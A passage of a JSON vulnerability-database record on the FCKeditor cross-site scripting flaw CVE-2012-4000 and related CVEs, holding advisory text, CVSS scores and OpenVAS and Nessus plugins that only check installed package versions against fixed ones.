script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202522-1\");\n script_tag(name:\"insight\", value:\"Emilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your fckeditor packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-1squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:51:03", "description": "The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2522-1 (fckeditor)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2012-4000"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71499", "href": "http://plugins.openvas.org/nasl.php?oid=71499", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2522_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2522-1 (fckeditor)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Emilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\n\nWe recommend that you upgrade your fckeditor packages.\";\ntag_summary = \"The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202522-1\";\n\nif(description)\n{\n script_id(71499);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2012-4000\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:20:46 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2522-1 (fckeditor)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-1squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-08-19T12:57:48", "description": "Emilio Pinna discovered a cross site scripting vulnerability in the spellchecker.php page of FCKeditor, a popular HTML/DHTML editor for the web.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-07T00:00:00", "type": "nessus", "title": "Debian DSA-2522-1 : fckeditor - XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:fckeditor", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/61438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2522. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61438);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-4000\");\n script_bugtraq_id(54188);\n script_xref(name:\"DSA\", value:\"2522\");\n\n script_name(english:\"Debian DSA-2522-1 : fckeditor - XSS\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Emilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular HTML/DHTML editor for\nthe web.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/fckeditor\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2522\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the fckeditor packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:fckeditor\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"fckeditor\", reference:\"1:2.6.6-1squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-03-27T14:52:05", "description": "Zarafa Collaboration Platform 7.1.14 final [51822] ================================================== - ZCP-13581: update fck- editor (for webaccess) to solve CVE-2012-4000 - ZCP-13572:\nCVE-2015-6566 - zarafa-autorespond suffers from a potential local privilege escalation - ZCP-13087: Meeting requests are not being sent with Thunderbird Lightning due to new functionality - ZCP-13608:\nAttachments are missing in the Sent items folder when using a cache profile - ZCP-13243: ser_safe_mode falsely reports that it would delete users\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora 
security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 21 : zarafa-7.1.14-1.fc21 (2015-a275fd68f2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4000", "CVE-2015-6566"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zarafa", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-A275FD68F2.NASL", "href": "https://www.tenable.com/plugins/nessus/89347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-a275fd68f2.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89347);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6566\");\n script_xref(name:\"FEDORA\", value:\"2015-a275fd68f2\");\n\n script_name(english:\"Fedora 21 : zarafa-7.1.14-1.fc21 (2015-a275fd68f2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zarafa Collaboration Platform 7.1.14 final [51822]\n================================================== - ZCP-13581: update\nfck- editor (for webaccess) to solve CVE-2012-4000 - ZCP-13572:\nCVE-2015-6566 - zarafa-autorespond suffers from a potential local\nprivilege escalation - ZCP-13087: Meeting requests are not being sent\nwith Thunderbird Lightning due to new functionality - ZCP-13608:\nAttachments are missing in the Sent items folder when using a cache\nprofile - ZCP-13243: 
ser_safe_mode falsely reports that it would\ndelete users\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1263006\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172605.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb9d58dc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, 
\"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"zarafa-7.1.14-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:30:41", "description": "\nEmilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular HTML/DHTML editor for the web.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\n\n\nWe recommend that you upgrade your fckeditor packages.\n\n\n", "cvss3": {}, "published": "2012-08-05T00:00:00", "type": "osv", "title": "fckeditor - cross site scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", 
"baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2022-07-21T05:47:46", "id": "OSV:DSA-2522-1", "href": "https://osv.dev/vulnerability/DSA-2522-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:29:33", "description": "Cross-site scripting (XSS) vulnerability in the print_textinputs_var\nfunction in\neditor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php\nin FCKeditor 2.6.7 and earlier allows remote attackers to inject arbitrary\nweb script or HTML via textinputs array parameters.", "cvss3": {}, "published": "2012-07-12T00:00:00", "type": "ubuntucve", "title": "CVE-2012-4000", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2012-07-12T00:00:00", "id": "UB:CVE-2012-4000", "href": "https://ubuntu.com/security/CVE-2012-4000", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:20:37", "description": "Cross-site scripting (XSS) vulnerability in\neditor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php\nin FCKeditor before 2.6.11 and earlier allows remote attackers to inject\narbitrary web script or HTML via an array key in the textinputs[]\nparameter, a different issue than CVE-2012-4000.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "ubuntucve", "title": 
"CVE-2014-4037", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2014-4037"], "modified": "2014-06-11T00:00:00", "id": "UB:CVE-2014-4037", "href": "https://ubuntu.com/security/CVE-2014-4037", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The Open Source Collaboration provides an integration with your existing Linux mail server, native mobile phone support by ActiveSync compatibility and a webaccess with 'Look & Feel' similar to Outlook using Ajax. Including an IMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open Source Collaboration can combine the usability with the stability and the flexibility of a Linux server. The proven Zarafa groupware solution is using MAPI objects, provides a MAPI client library as well as programming interfaces for C++, PHP and Python. The other Zarafa related packages need to be installed to gain all features and benefits of the Zarafa Collaboration Platform (ZCP). 
", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-11-23T23:21:38", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: zarafa-7.1.14-1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2015-6566"], "modified": "2015-11-23T23:21:38", "id": "FEDORA:B8A8E6087CFC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZO2KZ7XX3R2APFUTE2O2Y3ZFTV3IOYE3/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-07-04T06:00:54", "description": "Cross-site scripting (XSS) vulnerability in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor before 2.6.11 and earlier allows remote attackers to inject arbitrary web script or HTML via an array key in the textinputs[] parameter, a different issue than CVE-2012-4000.", "cvss3": {}, "published": "2014-06-11T14:55:00", "type": "debiancve", "title": "CVE-2014-4037", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2014-4037"], "modified": "2014-06-11T14:55:00", "id": "DEBIANCVE:CVE-2014-4037", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4037", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}